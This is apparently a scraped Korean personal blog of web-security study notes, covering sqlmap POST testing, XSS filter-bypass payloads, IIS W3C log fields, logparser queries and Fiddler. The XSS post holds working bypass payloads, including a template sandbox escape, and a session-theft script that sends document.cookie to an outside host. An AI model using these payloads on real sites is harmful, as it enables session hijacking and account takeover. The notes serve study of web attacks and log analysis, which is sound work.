'웹 > 기타' 카테고리의 다른 글
| fiddler 웹 디버거 (0) | 2016.06.21 |
|---|---|
| POST 메소드 전송 형태 (0) | 2016.06.21 |
| HTTP 프로토콜 Request header (0) | 2016.06.21 |
웹
- php server함수 펌 2017.01.30
- RFI LFI 펌 2017.01.30
- sqlmap 펌 2017.01.29
- sqlmap post testing 2017.01.29
- xss filter 우회 2017.01.18
- 공격 쿼리 모음 2017.01.15
- 서버타임 2017.01.15
- 로그 분석 툴 추천 logparser 2016.06.21
- 로그 포맷 유형 W3C 로그 확인법 2016.06.21
- fiddler 웹 디버거 2016.06.21
php server함수 펌
2017. 1. 30. 16:52
RFI LFI 펌
2017. 1. 30. 15:27
sqlmap 펌
2017. 1. 29. 18:41
sqlmap post testing
2017. 1. 29. 18:36
패킷 캡처후 file 로 저장
-r file이름 -p testparameter
sqlmap -r test.txt -p password
'웹 > SQL injection' 카테고리의 다른 글
| blind sql injection 활용 함수 (0) | 2017.01.31 |
|---|---|
| sql 필터링 우회기법 (0) | 2017.01.31 |
| [sql injection] information_schema.tables, procedure anaylse() (0) | 2017.01.31 |
| sqlmap 펌 (0) | 2017.01.29 |
| 공격 쿼리 모음 (0) | 2017.01.15 |
xss filter 우회
2017. 1. 18. 15:20
A = 'A'
문자를 hex값으로 나타낸 후 &#x를 붙이면 decoding될때 A로 나타남
특수기호는 직접 인코딩을 해줘야함
'A'=%26%23x0041
<script>가 필터링 될때
constructor(alert(1))()
constructor.constructor(alert(1))()
jinja
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{constructor.constructor(alert(1))()}
간단한 session탈취 스크립트
<script>window.location.href='http://shnec.sexy/xss?data='+document.cookie;</script>
공격 쿼리 모음
2017. 1. 15. 04:18
'웹 > SQL injection' 카테고리의 다른 글
| blind sql injection 활용 함수 (0) | 2017.01.31 |
|---|---|
| sql 필터링 우회기법 (0) | 2017.01.31 |
| [sql injection] information_schema.tables, procedure anaylse() (0) | 2017.01.31 |
| sqlmap 펌 (0) | 2017.01.29 |
| sqlmap post testing (0) | 2017.01.29 |
서버타임
2017. 1. 15. 02:02
웹공부도 할겸 짜봣는데
단순한 프로그램인데 좀 복잡하게 짠것같다
삽질도 많이했고..
setTimeout(\"realtimeClock()\", 1000);
여기서 realtimeClock이라는 함수에
매개변수를 넣어버리면
setTimeout으로 작동이 안됬다
그래서 처음에는 매개변수로 초를 셋는데 잘 안되어서 계속 삽질하다가
전역변수로 초를 셋더니 성공..
그래도 시간은 정확하다..ㅎㅎ
-> 켜놓고 다른 작업을 하면 시간이 잘 돌아가지 않는 것 같다.. 수정작업이 필요함..ㅠ
로그 분석 툴 추천 logparser
2016. 6. 21. 17:04
logparser
사용법
cmd에 입력한다
logparser "Select (추출할 필드 종류 cs-uri-stem,cs-uriquery 등) From (웹로그파일 위치)\*.*(*.*은 모든 파일 확장자 의미) to (저장할 장소 파일 이름) Where (필드 추출 조건 ex: sc-status=500)" -i:(입력되는 파일유형) -o:(결과물을 어떤파일로 추출할 것인가)
예시는 밑에 사이트를 참고
Log Parser Example Queries
http://logparserplus.com/Examples
출처 : 웹,해킹과 보안
'웹 > 로그 분석' 카테고리의 다른 글
| 로그 포맷 유형 W3C 로그 확인법 (0) | 2016.06.21 |
|---|
로그 포맷 유형 W3C 로그 확인법
2016. 6. 21. 16:21
win 7 환경에서
먼저 인터넷 정보 서비스(IIS)를 켜야한다.
제어판->프로그램_>window 기능 사용/사용안함->인터넷 정보서비스 체크
제어판->시스템->관리도구->IIS 관리자
로그옵션에 들어가보면 로그가 어디있는지 알수 있다.
IIS 는 W3C 로그 포맷을 이용하고 있다.
W3C에 이쓴ㄴ 정보는
time 접속한 시간
c-ip 사용자 정보, 공격자 ip
cs-username 접속한 사용자 계정
s-computername 웹서버 이름
s-ip 웹서버 ip
s-port 웹서버 포트
cs-method http 메소드
cs-uri-stem 요청 페이지
cs-uri-query 요청 파라미터 (대부분의 공격이 여기에 삽입)
Cs(referer) 해당 사이트 접속전 거친 사이트의 정보
Cs(cookie) 사용자의 쿠키
여기서 대부분의 공격 로그는
cs-uri-query에 집중되는데 기본설정에서는 이 정보가 빠져있으므로 이 정보를 로그에 포함되도록 설정하여 로그 분석에 지장이 없도록 한다.
출처 : 웹, 해킹과 보안
'웹 > 로그 분석' 카테고리의 다른 글
| 로그 분석 툴 추천 logparser (0) | 2016.06.21 |
|---|
fiddler 웹 디버거
2016. 6. 21. 15:31
request 패킷을 조작하기에 좋은 어플리케이션이 바로 Fiddler이다
자바 스크립트는 사용자측 스크립트로 웹 브라우저에서만 입력값을 검사한다.
fiddler는 웹 브라우저에서 서버로 전송되는 데이터를 캡처하므로 fiddler를 이용하면 java script를 우회할 수 있다.
fiddler에 대한 설명은 계속 더 보충하도록 하겠다.
6/21
----------------------------------------------------------------------------------------------
'웹 > 기타' 카테고리의 다른 글
| php server함수 펌 (0) | 2017.01.30 |
|---|---|
| POST 메소드 전송 형태 (0) | 2016.06.21 |
| HTTP 프로토콜 Request header (0) | 2016.06.21 |